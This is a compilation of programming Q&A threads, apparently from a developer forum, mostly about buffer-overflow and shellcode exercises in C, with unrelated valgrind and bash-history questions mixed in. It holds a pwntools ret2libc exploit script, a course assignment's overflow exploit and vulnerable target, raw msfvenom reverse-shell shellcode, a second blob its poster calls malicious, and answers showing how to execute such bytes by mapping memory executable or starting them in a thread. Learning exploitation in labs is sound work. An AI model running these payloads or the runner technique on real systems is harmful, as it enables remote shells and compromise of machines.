I was following a tutorial regarding bufferoverflow(ret2libc) attack and it failed due to unknown reasons. The C program I wrote is as follows:
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
int main(int argc, char** argv)
{
char buf[256];
gets(buf);
return 0;
}
and i compiled it so it so it has checksec as:
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
and the exploit i have written is:
from pwn import *
proc = process("./vuln")
junk = "A"*264
libc_base = 0x00007ffff7dee000
system_offset = 0x0000000000048df0
exec_offset = 0x00000000000cb7c0
exit_offset = 0x000000000003e600
binsh_offset = 0x18a156
system = str(base64.b64encode(p64(libc_base + system_offset)))
exit = str(base64.b64encode(p64(libc_base + exit_offset)))
binsh = str(base64.b64encode(p64(libc_base + binsh_offset)))
pop_rdi = str(base64.b64encode(p64(0x00000000004011bb)))
buf = junk + pop_rdi + binsh + system + exit
proc.sendline(buf)
proc.interactive()
But immediately after running the exploit it is giving me an error:
[+] Starting local process './vuln': pid 1595
[*] Switching to interactive mode
[*] Got EOF while reading in interactive
$
[*] Process './vuln' stopped with exit code -11 (SIGSEGV) (pid 1595)
[*] Got EOF while sending in interactive
Can someone please tell me what is the problem here, Thanks in advance.
Using base64.b64encode here is bad because it will encode the addresses and hide them from the machine that executes the code.
I didn't check well and there may be other errors, but the first thing to do is removing them and pass the machine the addresses of the parts.
Related
I am currently tackling on an assignment, where I need to upload exploit.c and target.c onto a ubuntu server, and successfully achieve a buffer overflow attack with exploit onto target. I was provided a shellcode. Now, target.c is not to be altered, just exploit.c. I had to use GDB on exploit.c to force an external breakpoint on foo() from target.c, to figure out the return addresses using info frame.
I was provided with the working shellcode, and minimal instructions.
I am pretty sure I was able to successfully pull the return addresses, but my issue is that I cannot figure out what code to put into exploit.c to have it successfully perform a buffer overflow attack. I was also instructed that one of the return addresses must be input into the exploit code for it to function properly.
I understand that the exploit is trying to call back to the return address, to then push itself into the buffer, so I can obtain access to the shell.
Here is exploit.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include "shellcode.h"
// replace this define environment to have the correct path of your own target code
#define TARGET "/*******************"
int main(void)
{
char *args[3];
char *env[2];
char *tmp = NULL;
// Creating an input buffer that can cause buffer overflow in strcpy function in the target.c executable code
int buffSize = 1000;
char buff[buffSize];
// Intialize buffer elements to 0x01
int i;
for (i=0; i < buffSize; i++) buff[i] = 0x01;
// write your code below to fill the 22 bytes shellcode into the buff variable, and
// at the correct location overwrite the return address correctly in order to achieve stack overflow
// Your own code starts here:
strcpy (buff[buffSize-22], shellcode);
// Your code ends here.
// prepare command line input to execute target code
args[0] = TARGET; // you must have already compiled and generated the target executable code first
args[1] = buff; // the first input parameter to the target code (artfully crafted buffer overflow string)
args[2] = NULL;
env[0] = "FOO=bar";
env[1] = NULL;
if (0 > execve(TARGET, args, env))
fprintf(stderr, "execve failed.\n");
return 0;
}
Here is the target.c code
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int foo(char* arg)
{
char localBuf[240];
short len = 240;
float var1=2.4;
int *ptr = NULL;
strcpy(localBuf, arg);
printf("foo() finishes normally.\n");
return 0;
}
int kbhit(void)
{
struct timeval tv;
fd_set read_fd;
tv.tv_sec=0; tv.tv_usec=0;
FD_ZERO(&read_fd); FD_SET(0,&read_fd);
if(select(1, &read_fd, NULL, NULL, &tv) == -1)
return 0;
if(FD_ISSET(0,&read_fd))
return 1;
return 0;
}
int main(int argc, char *argv[])
{
if (argc != 2)
{
fprintf(stderr, "target: argc != 2\n");
exit(EXIT_FAILURE);
}
printf("Press any key to call foo function...\n");
while(!kbhit())
;
foo(argv[1]);
return 0;
}
I compiled both target and exploit. Then I ran GDB on exploit, and formed a breakpoint using "break target.c:10". Using Info Frame I was able to obtain the return addresses.
I used strcpy, because it is essentially the only line of code we were taught for this section involving overflow attacks, even though it clearly states in the document "Fill the shell executable code (in the string array shellcode[]) byte-by-
byte into the buff for your modified return address to execute, do not
use strcpy() because shellcode[] is not an ASCII string (and not
copying NULL byte, too)."
Exploit compiles fine, and it runs fine, but it does not give me access to a shell. I was instructed that I would know if it worked, if I was presented with two dollar signs ($$) instead of one ($).
I am a network engineer, and I am not entirely savvy with C, or attacking vulnerabilities in programs, any help would be appreciated. The entire lesson revolves around "stack overflow", but this assignment is called "buffer overflow attack".
I have a program which creates another process using a fork and almost immedietely calls execv on a executable. I want to check for memory leaks on the child process. Since the main process starts a lot of other executables and runs many more scripts (which are too difficult to keep track of for using --trace-children option), I want to invoke valgrind from inside of the main process using execv and pass the executable as an argument.
My code goes something like this -
#include <stdio.h>
#include <string.h>
#include <unistd.h>
int main()
{
char tool[30], logpath[30], executable[30], exepath[30];
char *arguments[5];
strcpy(tool, "--leak-check=full");
strcpy(logpath, "--log-file=valrep.txt");
strcpy(executable, "./memleak");
strcpy(exepath, "/usr/bin/valgrind");
arguments[0] = exepath;
arguments[1] = tool;
arguments[2] = logpath;
arguments[3] = exepath;
execv("/usr/bin/valgrind", arguments);
return 0;
}
Where memleak is the program which I want to check for leaks. But when i run this program, I am getting this error.
Running valgrind using the tool: --leak-check=full.
The report is stored in: --log-file=valrep.txt.
valgrind: You cannot run '/usr/bin/valgrind' directly.
valgrind: You should use $prefix/bin/valgrind.
I did some googling but couldn't find out the reason. Please help!
You are not passing your executable path.
arguments[0] = exepath;
arguments[1] = tool;
arguments[2] = logpath;
arguments[3] = exepath;
Replace as
arguments[0] = exepath;
arguments[1] = tool;
arguments[2] = logpath;
arguments[3] = executable;
Let me know, if you face any issue with this..
I recently get interested in Metasploit, and I was trying to execute some shellcode from C code.
So i've generated with msfvenom a shellcode for LHOST = 127.0.0.1 and LPORT = 714 (so if you want to run the shellcode, no problem because localhost) and selected C format for output.
Then I found this : http://disbauxes.upc.es/code/two-basic-ways-to-run-and-test-shellcode/
and this : http://www.sevagas.com/?Hide-meterpreter-shellcode-in-executable
So what I did :
#include <stdio.h>
char code[] =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
"\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
"\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68"
"\x29\x80\x6b\x00\xff\xd5\x6a\x05\x68\x7f\x00\x00\x01\x68\x02"
"\x00\x02\xca\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea"
"\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5\x74\x61"
"\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2"
"\x56\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff"
"\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58"
"\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9"
"\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x75\xee\xc3";
int main(int argc, char **argv) {
int(*func) ();
func = (int(*) ()) code;
(int)(*func) ();
}
Compiled it, launched it.. And crash....
Exception non gérée à 0x00338000 dans Shellcode.exe : 0xC0000005 :
Violation d'accès lors de l'exécution à l'emplacement 0x00338000.
The crash is happening here : (int)(*func) ();
As I don't really understand what's the program is trying to do (I'm quite new to C), I don't know from where is the problem.. Is it my shellcode or is it the way it is called ?
And does someone has some documentation about executing shellcode in C/C++ ?
Thanks all for your help.
You are getting segmentation fault because the memory is not marked as executable.
#include <unistd.h>
#include <sys/mman.h>
#include <string.h>
void *buf;
/* copy code to executable buffer */
buf = mmap (0,sizeof(code),PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_PRIVATE|MAP_ANON,-1,0);
memcpy (buf, code, sizeof(code));
/* run code */
int i = ((int (*) (void))buf)();
printf("Return value [%d]\n", i);
The bytes represent machine instructions. On ordinary machines, the memory is broken in different memory segments, and code will typically goes in a data segment. The call:
int(*func) ();
func = (int(*) ()) code;
(int)(*func) ();
tries to execute the code contained in these bytes.
However, modern operating systems provide usually by default a protection against executing code located in memory segments not designed for code execution (see here for example). You have to configure your compiler to disable it.
My code:
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main(void)
{
printf("entering main process---\n");
int ret;
char *argv[] = {"history",NULL};
ret = execvp("history",argv);
if(ret == -1)
perror("execl error");
printf("exiting main process ----\n");
return 0;
}
Output:
entering main process---
execl error: No such file or directory
exiting main process ----
Question:
Can I get executed commands not using history or ~/.bash_history?
It seems that something is wrong using function like execvp .
I've tried system function.
Code:
#include <stdio.h>
int main()
{
system("history");
return 0 ;
}
Nothing output.
If you try a man history you will get into the BASH_BUILTINS(1) General Commands Manual page. This means history is part of the bash shell internals. In order to have something executed via execvp() you need to have an actual executable somewhere in your PATH.
It's unclear why reading ~/.bash_history is not enough. Is it perhaps because you want the history of the currently running shell?
The short answer is no, you can't get it.
The long answer is you could attach with ptrace or through /proc/pid/mem, find the history in memory, and print it.
Probably not worth the effort.
You can pipe the output of the history builtin if you wish, by running your program with
history | ./myprog
#include <stdio.h>
char shellcode[] = "some shellcode here";
int main (int argc, char **argv) {
void (*sptr)();
sptr = (void(*)()) (&shellcode);
sptr();
printf("must display this");
return 0;
}
While running the program, it executes the sptr() and hangs there, probably because of the shellcode is running in memory. printf("..") is never executed. My problem is I want the program to execute printf().
Please help :)
Reply to Eric Finn and Alvin Wong
I changed as what both of you instructed and the error I got is:
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
X:>"my program.exe"
'»".¼' is not recognized as an internal or external command,
operable program or batch file.
must display this
char shellcode[] is valid. I have compiled it successfully before.
below is the original code with malicious shellcode so your antivirus should detect it, just to verify you guys that the shellcode is not the problem:
#include <stdio.h>
#include <stdlib.h>
char shellcode[] = "\xda\xd3\xd9\x74\x24\xf4\xbd\xe9\x6d\xf8\x29\x58\x33\xc9\xb1"
"\x58\x31\x68\x18\x83\xe8\xfc\x03\x68\xfd\x8f\x0d\xd5\x15\xc6"
"\xee\x26\xe5\xb9\x67\xc3\xd4\xeb\x1c\x87\x44\x3c\x56\xc5\x64"
"\xb7\x3a\xfe\xff\xb5\x92\xf1\x48\x73\xc5\x3c\x49\xb5\xc9\x93"
"\x89\xd7\xb5\xe9\xdd\x37\x87\x21\x10\x39\xc0\x5c\xda\x6b\x99"
"\x2b\x48\x9c\xae\x6e\x50\x9d\x60\xe5\xe8\xe5\x05\x3a\x9c\x5f"
"\x07\x6b\x0c\xeb\x4f\x93\x27\xb3\x6f\xa2\xe4\xa7\x4c\xed\x81"
"\x1c\x26\xec\x43\x6d\xc7\xde\xab\x22\xf6\xee\x26\x3a\x3e\xc8"
"\xd8\x49\x34\x2a\x65\x4a\x8f\x50\xb1\xdf\x12\xf2\x32\x47\xf7"
"\x02\x97\x1e\x7c\x08\x5c\x54\xda\x0d\x63\xb9\x50\x29\xe8\x3c"
"\xb7\xbb\xaa\x1a\x13\xe7\x69\x02\x02\x4d\xdc\x3b\x54\x29\x81"
"\x99\x1e\xd8\xd6\x98\x7c\xb5\x46\xc0\x0a\x45\xfe\x7d\x9a\x2b"
"\x97\xd5\x34\xf8\x10\xf0\xc3\xff\x0b\xcd\x34\xa8\xe4\x79\x9c"
"\x3d\x0a\xd2\x4a\xf8\x5c\xa3\x2d\x03\xb5\xb8\x79\xa7\x04\xf6"
"\x2f\x06\x0c\x0b\x81\xf9\xb8\x5b\x21\xfa\x38\x0f\x71\x92\x6f"
"\x26\xee\xa4\x70\xed\xfa\x1d\xd7\x3f\x2f\x0f\x8f\x3f\xcd\x90"
"\xcb\x12\x83\x82\x82\xc0\x73\x4b\xcf\xb0\x5d\xb0\xf0\xee\x2b"
"\x00\x64\x01\x77\xbc\x87\x76\xd0\xe9\x20\x2f\xb6\x38\xc8\xd7"
"\x3d\xbc\x01\x62\x01\x37\xb3\x26\xf6\xa8\x28\x51\x1d\x81\x46"
"\x65\x1d\xed\x69\x45\x98\x22\xf8\xdf\x5c\x43\x6a\x10\xe9\xe1"
"\x3c\x2f\xc7\x8c\x80\xa7\xe8\x40\x00\x38\x81\x60\x00\x78\x51"
"\x36\x68\x20\xf5\xeb\x8d\x2f\x20\x98\x1e\x83\x42\x78\xf7\x4b"
"\x55\xa7\xf7\x8b\x06\xf1\x9f\x99\x3e\x74\xbd\x61\xeb\x02\x81"
"\xea\xd9\x86\x06\x12\x21\x1d\xc8\x61\x40\x46\x0b\x61\xef\x88"
"\x74\x8d\x9d\x1f\xe9\x00\x31\x93\x82\x82\xb9\x7d\x3f\x24\x2f"
"\x82";
int main (int argc, char **argv) {
void (*sptr)();
sptr = (void(*)()) (&shellcode);
sptr();
printf("must display this"); // instead of more lines i put this one
return 0;
}
the above code compiles successfully and runs perfectly
i changed some lines to system(shellcode). it compiles but doesnt run properly
Okay, since shellcode is actually machine code rather than shell code (according to your latest edit), the answer is different.
When you declare char shellcode[], shellcode is a pointer to a memory location. This means that instead of
sptr = (void(*)()) (&shellcode);
you should have
sptr = (void(*)()) (shellcode);
Additionally, you want the code to be in the executable part of your binary, rather than in the data part of the binary. That means you want char *shellcode = ... rather than char shellcode[] = ....
Also, you should be sure that shellcode is a valid compiled C function with the same calling convention as the code that calls it.
As my understanding, you want to run some "machine code" (not shellcode), and no matter how the code runs it should continue the program.
This is possible, by using threading.
First add these includes:
#include <windows.h>
#include <process.h>
And in your code:
void (*sptr)(void*); // Type for `_beginthread`
sptr = (void(*)(void*)) (&shellcode); // PLEASE rename to `machinecode`
_beginthread(sptr,0,NULL); // This starts your code in a new thread
Sleep(5000); // Wait for 5000 ms
printf("must display this");
Of course this is not a proper way to multi-thread a program, but since your code is "machine code" there's not much to be done.
P.S. When I try your code it finally reaches an "Access violation" (segmentation fault) (and it shows the "x.exe encountered a problem" dialog), and my antivirus didn't detect anything (do I need to switch to another one??), so you may need to review the code or add an exception handler...